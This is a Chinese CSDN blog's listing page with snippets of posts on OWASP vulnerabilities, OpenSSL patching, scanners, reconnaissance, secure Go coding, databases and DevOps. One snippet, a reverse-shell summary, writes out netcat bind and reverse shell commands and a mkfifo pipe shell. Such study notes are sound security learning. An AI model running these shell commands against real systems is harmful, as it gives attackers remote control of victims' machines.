- 博客(187)
- 资源 (5)
- 收藏
- 关注
RSS订阅原创 零漏洞开发指南(开发人员必看)【编辑中】
2021-OWASP失效的访问控制加密机制失效注入XSSSQL注入路径穿越命令注入不安全的设计安全配置错误自带缺陷和过时的组件身份识别和身份验证错误(无效的身份认证)软件和数据完整性故障安全日志和监控故障服务端请求伪造(SSRF)常见漏洞命令注入XSSSQL注入mongodb注入XXESSRF敏感信息泄露随意返回数据给前端任意文件下载(可能是放置错误文件到web目录了,也能是目录穿越导致,也可能是nginx配置错误导致)csrf( Cross Sit
2022-04-17 23:20:09
2515
原创 openssl 1.0.2 漏洞修复指南
项目初衷因为Openssl1.0.2版本,官方已不再维护开源版本。Openssl-1.0.2u为最新的1.0.2正式发布的开源版本。但是,Openssl-1.0.2u后续又爆出了一些漏洞,官方又不再维护,如何解决这些漏洞呢?1. 大版本升级,升级到1.1.1系列,或者3.x.x版本。2. 将漏洞修复代码合入到1.0.2u,继续使用1.0.2u。考虑到项目中使用openssl大版本升级影响较大,项目中依赖openssl的原有模块都需要修改并重新编译。所以,本文重点介绍第二种解决方案。Openss
2022-04-03 23:53:23
8129
原创 常用Web漏洞扫描工具汇总
转载自: http://fairysoftware.com/web_lou_dong_sao_miao. html1、AWVS,国外商业收费软件,据了解一个License一年费用是2万多RMB。可见总体漏洞扫描概况,也可导出报告,报告提供漏洞明细说明、漏洞利用方式、修复建议。缺点是限制了并行扫描的网站数。2、OWASP Zed(ZAP),来自OWASP项目组织的开源免费工具,提供漏洞扫描、爬虫、Fuzz功能,该工具已集成于Kali Linux系统。3、Nikto,一款开源软件,不仅可用于扫描发现网.
2022-03-12 19:01:55
5623
原创 安全攻防基础
信息搜集企业信息搜集企业架构天眼查企查查启信宝网站友情链接、网站地图收集子公司、分公司、参股公司等http://www.chinatelecom.com.cn/corp/zzjgcs/https://www.qcc.comhttps://www.tianyancha.comICP备案查询,确定目标子域名http://icp.bugscaner.com/http://icp.chinaz.com/http://www.gsxt.gov.cn/corp-query-homep
2022-03-02 19:48:42
5986
原创 反弹shell总结
nc反弹shell正向shellnc -lvp 1234 -e /bin/bash # linux 服务端(被攻击的主机)nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机)nc host.example.com 1234 # linux 客户端rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l host.example.
2022-02-09 23:57:10
1049
1
原创 常见漏洞汇总
zip相关zip炸弹zip目录穿越https://saucer-man.com/information_security/364.htmlzip软连接
2021-10-11 19:50:03
1118
转载 Go 安全编码学习
目录1 通用类I. 代码实现1.1 内存管理1.2 文件操作1.3 系统接口1.4 通信安全1.5 敏感数据保护1.6 加密解密1.7 正则表达式2 后台类I. 代码实现1.1 输入校验1.2 SQL操作1.3 网络请求1.4 服务器端渲染1.5 Web跨域1.6 响应输出1.7 会话管理1.8 访问控制1.9 并发保护通用类1. 代码实现类1.1 内存管理1.1.1【必须】切片长度校验在对slice进行操作...
2021-09-12 00:55:28
433
1
原创 mysql知识点汇总
常见问题质量好的https://www.sohu.com/a/331887831_120043609一般的https://zhuanlan.zhihu.com/p/164519371https://zhuanlan.zhihu.com/p/336828076https://zhuanlan.zhihu.com/p/112857507https://zhuanlan.zhihu.com/p/222958908https://blog.csdn.net/u014209205/article/de
2021-07-18 20:46:21
79
原创 操作系统知识点
内存管理https://www.cnblogs.com/loveer/p/11688111.htmlhttps://zhuanlan.zhihu.com/p/87514615https://www.cnblogs.com/CareySon/archive/2012/04/25/2470063.html冷门知识点64位系统的寻址空间,64位系统上进程的地址空间:47位可用(256T),17位保留https://blog.csdn.net/hbuxiaofei/article/details/
2021-07-18 20:42:46
84
原创 安全开发最佳实践
安全编码(各种语言)https://github.com/Tencent/secguidehttps://mp.weixin.qq.com/s/yzg5uVnoJDTyaH2Wn8Vo7whttps://mp.weixin.qq.com/s/Yp1e28hBXZREbK5ThjEpMA安全设计安全设计原则最小攻击面默认安全权限最小化纵深防御失败安全不信任第三方系统业务隔离公开设计简化系统设计使用白名单CIA鉴权/授权/不可抵赖STRIDE假冒篡改否认信息泄露
2021-05-30 21:29:09
175
原创 计算机网络知识点汇总
应用层netconfhttps://blog.csdn.net/anzheangel/article/details/78885880https://blog.csdn.net/qq_38265137/article/details/103756053SNMPhttps://blog.csdn.net/savelife5/article/details/79139981https://blog.csdn.net/shmily_cml0603/article/details/12968157h
2021-05-30 21:13:58
68
原创 Python基础知识
基本语法装饰器普通装饰器def func_time(func): def wapper(*args, **kwargs): start_time = time.time() res = func(*args, **kwargs) end_time = time.time() print("spend time:{}".format(end_time - start_time)) return resreturn
2021-05-30 21:12:00
57
原创 redis的五种数据结构和实现
Redis使用对象来表示数据库中的键和值,即每新建一个键值对,至少创建有两个对象,而且使用对象的具有以下好处:redis可以在执行命令前会根据对象的类型判断一个对象是否可以执行给定的命令针对不同的使用场景,为对象设置不同的数据结构实现,从而优化对象的不同场景夏的使用效率对象系统还可以基于引用计数计数的内存回收机制,自动释放对象所占用的内存,或者还可以让多个数据库键共享同一个对象来节约内存。...
2021-05-30 21:10:34
117
原创 golang学习1
win golang下载https://golang.google.cn/项目结构常用命令go rungo buildgo build -o test.exego install交叉编译go支持跨平台编译例如:在windows平台编译一个能在linux平台执行的可执行文件SET CGO_ENABLE=0 # 禁用CGOSET GOOS=linux # 目标平台是linuxSET GOARCH=amd64 # 目标处理器是amd64go build25个关键字
2020-11-08 23:17:07
107
原创 2020-10-18
##Libev源代码结构 对于毕业生,尤其是没有接触过一些已有工程代码的新人。拿到一份源码,怎么去熟悉它是首要解决的问题。我一般把会把源码进行分类:一类是产品类的,就比如Redis、Ngnix这一类本身是一个完整的可以运维的成熟产品;另一类就是Libev这样的组件类的。对于组件类的项目,我一般就是分成这样几步:有文档看文档,没有文档问相关人员(包括Google),这个组件主要提供什么服务结合上述信息使用组件的AIP写个示例程序,跑起来大致浏览下源码,分析一下代码的组织结构根据使用的API,进到源码中
2020-10-18 13:55:53
105
原创 git常用操作记录
因为用idea全家桶贼舒服,包括他们集成的git操作,全快捷键操作,熟悉了肯定比命令行操作要快一些了,本文主要是为了记录作者如何用idea(pycharm)进程git amend相关操作的。追加commit如果提示有冲突的话,选择rebase按钮合并冲突。(没有提示,则说明没有冲突,无需这一步)push。如果之前已经push过依次的话,这次必须force push。修改commit信息修改完成后,需要push到云端。如果之前push过,则必须force push,没有的话,正常pus.
2020-08-20 00:09:02
1513
1
原创 plant-UML画图笔记
画图工具安装之前一直用process_on、百度脑图、亿图等工具画图,见有人分享了用plantUML语言画图,不禁感叹 diao;目前我采用采用的画图工具是:jetbrain 系列IDE【就是: pycharm、PHPstorm、Clion、Goland等工具都可以】+ PlantUML integration 插件 + Graphviz;假设你安装了任意一个jetbrain 系列IDE;在线搜索插件PlantUML integration并安装,或者离线安装(地址:https://plugi
2020-08-09 18:02:37
1262
原创 linux性能优化-学习总结(1)
声明,本文中有部分内容摘自,倪鹏飞老师在极客时间的性能优化课程,大家感兴趣的还是去听一下老师的课会更有收获,老师的课讲的非常不错。 课程链接:https://time.geekbang.org/column/intro/140知识体系知识有体系了才能更长久的存留与脑中,需要到的时候才能想起来,才能起作用。性能优化脑图性能优化工具汇总性能问题排查思路思路1选择指标评估应用程序和系统的性能为应用程序和系统设置性能目标进行性能基准测试性能分析定位瓶颈优化系统和应用程序性能监控.
2020-07-16 23:49:01
841
原创 docker镜像加速器配置
我们国内使用官方Docker Hub仓库实在是太慢了,很影响效率使用命令编辑文件:vim /etc/docker/daemon.json腾讯云服务器{ "registry-mirrors": ["https://mirror.ccs.tencentyun.com"]}阿里云加速器链接:https://yq.aliyun.com/articles/29941一般是要登陆到控制台,然后拷贝一下你的加速链接到 /etc/docker/daemon.json 此文件。保存重启服务syst
2020-05-31 15:36:03
204
原创 celery框架
异步任务框架,等你补充异步任务/分布式框架他的存在是为了解决什么问题?他的演进过程?一个任务的整个生命周期进程/线程/协程的使用典型的问题...
2020-04-08 23:29:23
270
1
原创 flask框架
看你什么时候补充可以参考一些优秀的源码分析博文,学习整个框架。学习一些设计理念。学习一些python的高级用法。学习一些典型问题,典型问题的解决方式,明白他为什么这么做。...
2020-04-08 23:26:36
163
原创 redis持久化
参考:https ????/www.jianshu.com/p/d3ba7b8ad964https ????/baijiahao.baidu.com/s?id=1654694618189745916&wfr=spider&for=pchttps ????/blog.csdn.net/summerZBH123/article/details/81406856redis是一个内存数据库,数据...
2020-03-29 19:02:31
119
原创 redis缓存的雪崩与穿透总结
参考:https ????/blog.csdn.net/qq_35433716/article/details/86375506为什么要用缓存提高查询速度:缓存的查询速度比数据库的查询速度快。提高并发量:缓存承担的部分请求,支持更高的并发。缓存雪崩什么是缓存雪崩缓存大面积失效,导致大量请求直接请求数据库,从而导致系统崩溃。缓存系统挂掉,导致请求直接到数据。如何解决缓存雪崩针对...
2020-03-29 18:14:43
103
原创 docker隔离技术
docker底层的 2 个核心技术分别是 Namespaces 和 Control groupsnamespace:Linux命名空间,实现进程间信息的独立与隔离需要在操作系统内核层面进行实现的Mount Namespaces:挂载命名空间,用于隔离挂载目录为什么要通过Mount namespace隔离挂载目录?如果说隔离在某个namespace中的程序,可所挂载的目录进行修改,那么另一个...
2020-02-25 23:14:24
2114
2
原创 数据库三种范式
第一范式表项要符合原子性,不可被拆分不符合第一范式的话,不能建表第二范式非主属性不存在对码的部分依赖(非主属性要完全依赖码)存在的问题:插入/删除/修改问题第三范式不存在传递依赖关系。(合理的拆分表)前面的问题得到解决数据库三大范式讲解视频...
2020-02-16 17:27:45
164
原创 事务的四种隔离级别
四种级别中间穿插三种问题read_uncommitted(未提交读)问题:脏读read_committed(提交后读)问题:不可重复读oracle/sql serverrepeatable_read(可重复读)问题:幻读mysql事务默认的隔离级别。serializable(序列化)上面的三种问题全部解决,但是随之而来的问题是,降低了数据库的并发性能。...
2020-02-16 16:15:54
105
原创 开源协议说明(持续更新中)
GPL简单的说,以GPL协议发布到网上的素材,你可以使用,也可以更改,但是经过你更改然后再次发布的素材必须也遵守GPL协议,主要要求是必须开源,而且不能删减原作者的声明信息等。...
2020-02-13 16:43:07
279
原创 交换机vlan接口区分
问题因为数据包带了vlan标签,所以路由器上的策略路由没有匹配到这些数据包解决方式数据从物理出口流进平台时,剥离vlan标签。但是添加什么子接口能够剥离vlan标签呢?trunk口、access口?...
2020-02-09 21:59:56
666
原创 分布式锁
需求实现一个分布式锁问题分布式锁与传统的锁有和区别关于这个问题相关的解释不是很多,没看到官方解释和对比;民间的解释是这样的,我们所说的传统的锁,一般指的是线程锁,而分布式锁指的是进程锁。个人对民间的这种称呼,不是很认同。单主机下的进程锁,和多主机下的进程锁(分布式锁)应该还是区别,至少实现上来说多主机锁,需要比单主机进程所多考虑一点跨主机的网络通信问题。这个网络通信是对进程锁的设计,在...
2020-02-09 01:45:36
268
原创 时序锁
问题我们传统的互斥锁,是不支持时序(按照抢锁的先后顺序获取锁。)我们遇到一种情况,我们的一个任务超时时间设置的是30min。多个任务并发时,因为存在共享资源A,需要对共享资源A加阻塞锁,预计正常情况下每个任务会占用锁5分钟。我们的异步任务框架,限制同时正在运行的并发任务的个数是3个。按照传统的思考方式,一个任务最多等待 2*5min,但是实际情况是,我们依次下发了10个任务a,b,c,d,e...
2020-02-07 03:02:41
422
原创 python类的继承顺序
python类的继承顺序新式类:广度优先(BFS)经典类:深度优先(DFS)新式类和经典类python2class A: pass # 经典类class A(): pass # 经典类class A(object): pass # 新式类python3取消了经典类,全是新式类,全是bfs;class A: pass # 经典类class A(): pass # 新式类...
2020-01-09 00:26:49
432
原创 开始捡起博客了
此文目的开始捡起博客,每周至少输出一篇博客,忌涉密写博客的目的还是想养成一个持续学习的好习惯,向博客大佬学习形成有体系的知识架构,先开拓深度,然后在开拓广度。具体产出博客分类开源软件的学习,比如nginx、apache、redis等网络协议栈的深入语言知识点、备忘录编程算法(此项可以持续让大脑保持一个深度思考的状态)感悟,当然了这个外人看不到此文时间2019-11-3...
2019-11-03 23:45:41
95
原创 hexo博客迁移
因为,要重装系统,所以原来的hexo博客,该怎么办呢? 1. 直接吧全部文件夹拷走,然后到新机器上装好环境,拷回来。(费事,麻烦还不可行,我最后恢复过来有问题) 2. git push到github上?这是个好主意,但是,注意你的.gitignore文件(你当时装hexo,装next主题时就有这个了)。我当时没有注意这个,然后直接push上去。后来,git clone下来之后 ,发现,不能用,仔
2017-09-29 13:26:36
2566
原创 脚本题
使用for循环在/oldboy目录下批量创建10个html文件,其中每个文件需要包含10个随机小写字母加固定字符串oldboy#!/bin/bashpath="./oldboy/"rand(){ ran=() for i in {0..9};do ran[${i}]=`expr ${RANDOM} % 26` done}tab(){ Tab=()
2017-09-24 02:25:37
669
原创 嵌入式作业
选题基于树莓派的家庭私有云的实现意义NAS 实际上就是一个私有云服务器,为家中其他设备服务的。存储与备份这个自不必多说。现在市面上的家用NAS系统基本都具备自动备份功能,有些厂商甚至开发有自动备份的PC客户端。 像我用的是群晖的NAS,除了支持windows备份和MAC的 Time Machine之外,还支持自家开发的备份软件Data Replicator。 有些人可能会说,我备份用块移动硬盘
2017-09-16 10:59:05
712
leetcode题目分类.txt
2021-06-19
IO_stack_of_the_Linux_kernel.svg
2020-02-19
django官方2.1文档
2020-02-19
蓝桥杯历届题目和测试数据(oj建设题库)
2020-02-19
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人